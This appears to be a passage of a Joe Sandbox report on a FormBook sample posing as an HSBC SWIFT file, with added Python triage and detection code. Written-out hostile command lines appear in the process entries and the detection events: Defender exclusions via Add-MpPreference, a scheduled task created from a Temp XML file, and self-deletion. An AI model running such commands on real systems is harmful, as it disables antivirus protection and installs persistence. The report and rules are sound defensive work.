              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              General

              Start time:18:49:47
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\msdt.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\msdt.exe
              Imagebase:0xf60000
              File size:1508352 bytes
              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate
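The Source field of each Yara match above names a memory dump, and the dump name encodes which process the hit came from, the region's base address and its page protection. The Python below is an added example, not part of the Joe Sandbox report: it parses those Source names and flags the FormBook hits that sit in writable and executable memory, which is the footprint of a payload written into a hollowed or injected process rather than loaded from disk. The field layout of the .sdmp name (process index, dump state, dump id, base, protection, type) is an assumption inferred from the values shown; the only decoding the triage relies on is the Windows PAGE_* protection constant (0x40 is PAGE_EXECUTE_READWRITE, 0x04 is PAGE_READWRITE). The sample lines are copied from the process blocks above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Yara matches" bullets from the process
# blocks above, copied verbatim. Only the Source field drives the triage.
YARA_LINES = """
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
"""

# Assumed layout of a dump source name (not documented on this page):
#   <process index>.<dump state>.<dump id>.<base address>.<protection>.<type>.sdmp
# Every field except the dump id is read as hexadecimal. The protection field
# is taken to be a Windows PAGE_* value; nothing else is interpreted.
SOURCE_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)
LINE_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>\S+),\s*Author:\s*(?P<author>.+)$"
)

# Windows memory protection constants (low byte of the protection value).
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80


def parse_source(name):
    """Split a .sdmp source name into its numeric fields."""
    m = SOURCE_RE.match(name)
    if not m:
        raise ValueError("unrecognised dump source: %s" % name)
    return {
        "pid": int(m["pid"], 16),
        "state": int(m["state"], 16),
        "dump_id": int(m["dump_id"]),
        "base": int(m["base"], 16),
        "protect": int(m["protect"], 16),
        "mtype": int(m["mtype"], 16),
    }


def is_writable_executable(protect):
    """True for PAGE_EXECUTE_READWRITE / PAGE_EXECUTE_WRITECOPY (modifier bits ignored)."""
    return (protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)


def parse_yara_line(line):
    """Parse one 'Rule: ..., Source: ..., Author: ...' bullet; None if it is not one."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = {k: m[k].strip() for k in ("rule", "desc", "source", "author")}
    rec.update(parse_source(rec["source"]))
    return rec


def triage(text, family="formbook"):
    """Summarise where a family's Yara hits landed and which of them are in RWX memory."""
    hits = [r for r in (parse_yara_line(l) for l in text.splitlines()) if r]
    fam = [r for r in hits if family in r["rule"].lower()]
    rwx = {(r["pid"], r["base"], r["rule"]) for r in fam if is_writable_executable(r["protect"])}
    # A family hit at 0x400000 in writable+executable memory is the classic
    # footprint of a 32-bit PE written over a hollowed process image.
    image_base_rwx = sorted({pid for pid, base, _ in rwx if base == 0x400000})
    per_process = defaultdict(set)
    for r in fam:
        per_process[r["pid"]].add(r["rule"])
    return {
        "family_processes": sorted(per_process),
        "rwx_hits": sorted(rwx),
        "image_base_rwx": image_base_rwx,
    }


if __name__ == "__main__":
    summary = triage(YARA_LINES)
    print("FormBook seen in process indices:", summary["family_processes"])
    for pid, base, rule in summary["rwx_hits"]:
        print("  RWX region pid=%d base=0x%X rule=%s" % (pid, base, rule))
    print("hollowed-image candidates:", summary["image_base_rwx"])
```

Run against the lines above, the family shows up in process indices 0, 8, 10 and 20; the hits in 8 (the re-launched sample, at 0x400000), 10 (explorer.exe) and 20 (msdt.exe) are in RWX regions, while the hits in process 0 (the original .NET loader) are in plain read/write heap, i.e. the decrypted payload before it was written anywhere executable.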

              General

              Start time:18:49:52
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
              Imagebase:0x2a0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Start time:18:49:53
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Start time:18:50:15
              Start date:25/11/2021
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:explorer.exe
              Imagebase:0x7ff6f22f0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
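Read in order, the process list above is the whole chain: the .NET loader excludes itself and its persistence copy from Defender via PowerShell, registers a scheduled task from an XML file in the user's Temp directory, re-launches its own image (the second copy is reported as native code, not .NET, because the image was replaced in memory), and a cmd.exe spawned from the injected host deletes the original file. The Python below is an added example, not part of the Joe Sandbox report: a detection pass over process-creation events that encodes each of those four behaviours as a rule and walks the parent chain of an alert. The events reuse the report's command lines; the pid numbers and the parent/child links are assumed, since the report lists start times rather than parent ids.

```python
import re

# Constructed process-creation events modelled on the process blocks above.
# pids and parent links are assumed; the command lines are the report's.
EVENTS = [
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 100, "ppid": 50, "image": r"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe",
     "cmdline": r'"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe"'},
    {"pid": 103, "ppid": 100, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp"'},
    {"pid": 104, "ppid": 100, "image": r"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe",
     "cmdline": r"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"},
    {"pid": 105, "ppid": 50, "image": r"C:\Windows\SysWOW64\msdt.exe",
     "cmdline": r"C:\Windows\SysWOW64\msdt.exe"},
    {"pid": 106, "ppid": 105, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'},
    {"pid": 107, "ppid": 101, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def defender_exclusion(ev, ctx):
    """PowerShell adding a Defender exclusion (path, process or extension)."""
    return bool(_basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
                and re.search(r"add-mppreference", ev["cmdline"], re.I)
                and re.search(r"-exclusion(path|process|extension)", ev["cmdline"], re.I))


def schtasks_xml_from_temp(ev, ctx):
    """schtasks /Create whose task definition is an XML file under the user's Temp."""
    if _basename(ev["image"]) != "schtasks.exe":
        return False
    c = ev["cmdline"]
    return bool(re.search(r"/create\b", c, re.I)
                and re.search(r'/xml\s+"?[^"]*\\appdata\\local\\temp\\', c, re.I))


def self_spawn(ev, ctx):
    """A process whose parent runs the very same image: a loader re-launching itself."""
    parent = ctx["by_pid"].get(ev["ppid"])
    return parent is not None and parent["image"].lower() == ev["image"].lower()


def self_delete(ev, ctx):
    """cmd.exe /c del of an executable that is the image of a process seen in this tree."""
    if _basename(ev["image"]) != "cmd.exe":
        return False
    m = re.search(r'/c\s+del\s+"?([^"]+?\.exe)"?', ev["cmdline"], re.I)
    return bool(m) and m.group(1).lower() in ctx["images"]


RULES = {
    "defender_exclusion": defender_exclusion,
    "schtasks_xml_from_temp": schtasks_xml_from_temp,
    "self_spawn": self_spawn,
    "self_delete": self_delete,
}


def detect(events):
    """Return (rule name, pid) for every event that trips a rule."""
    ctx = {"by_pid": {e["pid"]: e for e in events},
           "images": {e["image"].lower() for e in events}}
    return [(name, ev["pid"]) for ev in events
            for name, rule in RULES.items() if rule(ev, ctx)]


def lineage(events, pid):
    """Image basenames from pid up to the root of the tree we know about."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for name, pid in detect(EVENTS):
        print("%-24s pid=%d  chain=%s" % (name, pid, " <- ".join(lineage(EVENTS, pid))))
```

The self_delete rule deliberately insists that the deleted file be the image of a process already in the tree; a bare "cmd /c del something.exe" is too common in installers to alert on alone, while deleting an executable that is (or was) running in the same tree is the self-removal pattern shown above. The lineage of that alert ends in msdt.exe under explorer.exe rather than in the sample, which is exactly what injection into a system host looks like from process telemetry.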

              Disassembly

              Code Analysis


                Executed Functions

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID:
                • String ID: 48l$48l$d
                • API String ID: 0-4238415151
                • Opcode ID: 682e83db24d08eaacf78103a37980fd34e25c7e5aeffbc42fd79dee631569122
                • Instruction ID: 48752d60943dfb829d09bd15775b50f330cfd7b2f813ebab170f4d96eaf63280
                • Opcode Fuzzy Hash: 682e83db24d08eaacf78103a37980fd34e25c7e5aeffbc42fd79dee631569122
                • Instruction Fuzzy Hash: 3DC23B38B01219CFDB68DF64D459A99BBB2FB89304F1184A9D90A9B365DF30DD82CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c5c4705c0d0399e4ac8547ab494845fad9dfe473f66193ad0074016e70a4e8c
                • Instruction ID: 6b768bca7d33ec4f827713e11f3264da540451fc94d4816160df15cc57dcb7d7
                • Opcode Fuzzy Hash: 1c5c4705c0d0399e4ac8547ab494845fad9dfe473f66193ad0074016e70a4e8c
                • Instruction Fuzzy Hash: B7020331A00235CFDF25DF69C4542BEFBE2AF44304F158869E8169B396DB36D8468B93
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10ee9eb38538b8fedd3cb2d5e507393419ae29c71ae9ddde35ded6fb0d685849
                • Instruction ID: 1154f0748f346db891a83ff6af95ab415f57bf16ef3c5df9a75ea68b5a06815f
                • Opcode Fuzzy Hash: 10ee9eb38538b8fedd3cb2d5e507393419ae29c71ae9ddde35ded6fb0d685849
                • Instruction Fuzzy Hash: 16D1D130B88255CBCB01EB69C854ABEFBB2FF44304F148266E655DB2D2D334E841EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: Xcl$Xcl$Xcl$Xcl
                • API String ID: 0-3823498771
                • Opcode ID: b1581f3a69c9bd691eb9bb12662dc502d3b2821fd77fc94a3f3a1c5f4cec2f73
                • Instruction ID: 94417e1fd0e322543eb86b3f4c1f8f70518b64676ed42a0b5ca00ef54c21a361
                • Opcode Fuzzy Hash: b1581f3a69c9bd691eb9bb12662dc502d3b2821fd77fc94a3f3a1c5f4cec2f73
                • Instruction Fuzzy Hash: 8F616A35B501148FCB14EFA9D854ABD7BB6FF89714F144469E902AB3A0CB31DC15EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $%l$$%l
                • API String ID: 0-4074844668
                • Opcode ID: e1f4980060baa86896b7333d93b15289e7125f50edb4df9b12da1b0df571f26c
                • Instruction ID: 8101e782eb9e7cff642f3b88e22dddccd466ac8dd6d8b5daf9f360b4f6b3cf87
                • Opcode Fuzzy Hash: e1f4980060baa86896b7333d93b15289e7125f50edb4df9b12da1b0df571f26c
                • Instruction Fuzzy Hash: 3821C3757006058FCB14EBA8D4199EEB7F6EF94208B45882DD506DB750EF74ED088BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 017247CD
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: 0812e0184250a3349468e1ad092a2b01c61661d1c104b5aff5bd4de0235146f5
                • Instruction ID: 740d8d9a77808a782be0f037a163bef33531ac0de7e4f11bbc53ce8dfaeb1213
                • Opcode Fuzzy Hash: 0812e0184250a3349468e1ad092a2b01c61661d1c104b5aff5bd4de0235146f5
                • Instruction Fuzzy Hash: 5521ACB9810365CFDB10DFAAD50939ABFF8EB09314F10842AD41AE7782CB799505CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 01724522
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: f8dcf74b6923ed42911b803179f55aaf7ab845715f0b86c3079e2432ffefde48
                • Instruction ID: 0cfe768ff33654a6bc379c16cef2f13f73ee720f9e0bf73d0432d58483a9f6c1
                • Opcode Fuzzy Hash: f8dcf74b6923ed42911b803179f55aaf7ab845715f0b86c3079e2432ffefde48
                • Instruction Fuzzy Hash: 5F2156B59003458FDF50DFAAD94939EBFF4EB48318F208829E846A7641DB79A504CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 01724522
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: 7245ff225fda93bf90c893d388c9a5837dee3c25f2b2fc4402d5cc227384a9fb
                • Instruction ID: 0f458d108a940d7dd9e8a95606f8f78f16eaf69ed76d294dc3233d63f3f34ae7
                • Opcode Fuzzy Hash: 7245ff225fda93bf90c893d388c9a5837dee3c25f2b2fc4402d5cc227384a9fb
                • Instruction Fuzzy Hash: BF115674A00255CFDF50DFAAD94879EBFF4EB48314F208829D806A7641CB79A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $,l
                • API String ID: 0-2092904771
                • Opcode ID: 3af91d9470c5a65d9129836d673deb0810bfe8733d36373b60df45da9889786c
                • Instruction ID: 7ba63af2e14e3afc8e48af508e7288a21ed62ab0548175fef89cbe3e49f927e6
                • Opcode Fuzzy Hash: 3af91d9470c5a65d9129836d673deb0810bfe8733d36373b60df45da9889786c
                • Instruction Fuzzy Hash: 7781F270B502158FCB18EBA4C8596BE7BB6FF85304F24886DD0069F396DB31CC459BA2
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID: $,l
                • API String ID: 0-2092904771
                • Opcode ID: 82a032917a997f7bb3de743430c6101ec42b9b9eefdc269e25190ee30cc64f84
                • Instruction ID: 4fcdfa8a70aca472544a524db970428f58865796c9e5e0f2c0b9cbce6b22377f
                • Opcode Fuzzy Hash: 82a032917a997f7bb3de743430c6101ec42b9b9eefdc269e25190ee30cc64f84
                • Instruction Fuzzy Hash: C651E131B801249FD718AB78C84477EBAA6EF89314F248438D90ADB794DF36DC0197A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2bb1cf9a4a0eed392d6769433d0323995d15510cc316f89091daea2494be828
                • Instruction ID: c360e457fc2b71acd2148737e5a6d1b3f2246c1dfcdd8e6e35a8b533c68aa4e4
                • Opcode Fuzzy Hash: d2bb1cf9a4a0eed392d6769433d0323995d15510cc316f89091daea2494be828
                • Instruction Fuzzy Hash: 26E18F707012069FCB18EF75C490ABEBBB7BF89204B19C56DE806DB244EB30D941DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd1e1d873cb9a0d74e59541eef7ec4ff624801524fbbd9c10f76616e8e5b68db
                • Instruction ID: 169a587f0e77eeba5406bc450f473be1c6ef70308d03d77b6449817ec2818f8f
                • Opcode Fuzzy Hash: fd1e1d873cb9a0d74e59541eef7ec4ff624801524fbbd9c10f76616e8e5b68db
                • Instruction Fuzzy Hash: 4851F330B446068FDB10EFB8C988ABFBBB6AF85310F158569E405D7261EB30EC40D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0948b39de03363711cc2b1afa251d9d3a59ec866b82f6710a798cdf19d991c96
                • Instruction ID: 93d7d367c4c4a75bd599b4c36b42b47474d256fb2c4a93e33e6e774301f6d755
                • Opcode Fuzzy Hash: 0948b39de03363711cc2b1afa251d9d3a59ec866b82f6710a798cdf19d991c96
                • Instruction Fuzzy Hash: 9E711E35A40619DFCB14DFA9C498AADBBF2FF48314F218159E50AAB360DB71ED45CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14824ff489c81c6eb539fdaef31e7a416d0fbf54462376972f92443637944032
                • Instruction ID: af0a1c9418c80205826a5e4b408783d41f79aa51e252853c90d04d70b61a204a
                • Opcode Fuzzy Hash: 14824ff489c81c6eb539fdaef31e7a416d0fbf54462376972f92443637944032
                • Instruction Fuzzy Hash: E451B231B002568F8F14EBB998488BEBBB7FFC52247558929E429D7350EF709C0587A0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1904bc5538c4040632e228601070f332fa28b6d99b78ae0e97aaa986b6127353
                • Instruction ID: 9fa6af758ad8ff35c6e2149b2292716289be7685bd9904dcb523691537d5ecc8
                • Opcode Fuzzy Hash: 1904bc5538c4040632e228601070f332fa28b6d99b78ae0e97aaa986b6127353
                • Instruction Fuzzy Hash: 8841C031B89601CBD7199B69C840779BBB2FB42315F68826BE067CB292D33BC446E751
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd53e1b9b38de3d8f24a9fd5b02bab07eef9e45e954d4fd0be5767e56683c3d5
                • Instruction ID: 2b711b8d258fa7dc960fccc733d3e1951ac53bfe46c53266412146af30b7ed08
                • Opcode Fuzzy Hash: dd53e1b9b38de3d8f24a9fd5b02bab07eef9e45e954d4fd0be5767e56683c3d5
                • Instruction Fuzzy Hash: 91413631648250CFC7219BA9C8817BAB7B1FF45315F1845EBE666CB7A2E338C840E752
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0962a8d954878160552acb663f99abb6e008f129ac2d3ea355b8eb82416bbde
                • Instruction ID: eea0ff0a1137293322bb430b3edc060e2056c0848e1d56b86270d7c3235f665c
                • Opcode Fuzzy Hash: c0962a8d954878160552acb663f99abb6e008f129ac2d3ea355b8eb82416bbde
                • Instruction Fuzzy Hash: 66315530A4C245CFC701EB69CC096BABFB1EF81310F0581A7E6A1CB5A7D3349A80E351
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76fade7d3dcb08806601950e0fb50982c1790e6b31d3362ec9b7f0d2cc0753a0
                • Instruction ID: baa1735d692ae631dd159de3374196f94aca0210e570d137ba6d9131d1b45d65
                • Opcode Fuzzy Hash: 76fade7d3dcb08806601950e0fb50982c1790e6b31d3362ec9b7f0d2cc0753a0
                • Instruction Fuzzy Hash: 0341F2B1D00249DBDB20DFE9C584ADEFBB5BF49304F24846AD408BB240D7756A8ACF91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 94d3b5dd1e19903b302828574c9dc7f93a545c60381ffd8371cbabac59757d78
                • Instruction ID: 27741a3a01ad0a36dd4ecd7b64e27ffe1b59336fd6cf864fd2ddd8a0fd3324b5
                • Opcode Fuzzy Hash: 94d3b5dd1e19903b302828574c9dc7f93a545c60381ffd8371cbabac59757d78
                • Instruction Fuzzy Hash: FD316F343002448FCB04EF64C995DAAB7E6EF85748B148D6AE5068F3B5DB71EC059BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Non-executed Functions

                APIs
                • RtlDecodePointer.NTDLL ref: 0172FC8C
                • RtlDecodePointer.NTDLL ref: 0172FCCB
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FD32
                • RtlDecodePointer.NTDLL(00000000), ref: 0172FD6E
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FDA8
                • RtlDecodePointer.NTDLL ref: 0172FDE8
                • RtlDecodePointer.NTDLL ref: 0172FE26
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: Pointer$Decode$Encode
                • String ID:
                • API String ID: 1638560559-0
                • Opcode ID: 5eb67d3bd1e90467136c242e963479080258dae5ae52b5f1ace161f62e2847db
                • Instruction ID: d0fb75ee902afefafaeab3e4a02043be8a8fbb4b41d2c6eceb89e7f95b9c7fd6
                • Opcode Fuzzy Hash: 5eb67d3bd1e90467136c242e963479080258dae5ae52b5f1ace161f62e2847db
                • Instruction Fuzzy Hash: 00611570C0035ACFEF219FAAC4483AEFFF4AB09319F14892ED469A6291C7795585CF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlDecodePointer.NTDLL ref: 0172FC8C
                • RtlDecodePointer.NTDLL ref: 0172FCCB
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FD32
                • RtlDecodePointer.NTDLL(00000000), ref: 0172FD6E
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FDA8
                • RtlDecodePointer.NTDLL ref: 0172FDE8
                • RtlDecodePointer.NTDLL ref: 0172FE26
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: Pointer$Decode$Encode
                • String ID:
                • API String ID: 1638560559-0
                • Opcode ID: 8449de3649970613c3c0bf7cf634c21d3ac3bccadd5fe542d68d07a4080bf8cc
                • Instruction ID: 179bc96643280694bb9745b8e56342e2c61baaebdfdab6de24310ecf32749639
                • Opcode Fuzzy Hash: 8449de3649970613c3c0bf7cf634c21d3ac3bccadd5fe542d68d07a4080bf8cc
                • Instruction Fuzzy Hash: A0615970C00399CFEF21DFAAC4483AEBFF4AB19309F14891EE465A6291C7795185CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                C-Code - Quality: 37%
                			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                				void* _t18;
                				void* _t27;
                				intOrPtr* _t28;
                
                				_t13 = _a4;
                				_t28 = _a4 + 0xc48;
                				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                				_t4 =  &_a40; // 0x413a21
                				_t6 =  &_a32; // 0x413d62
                				_t12 =  &_a8; // 0x413d62
                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                				return _t18;
                			}

                APIs
                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
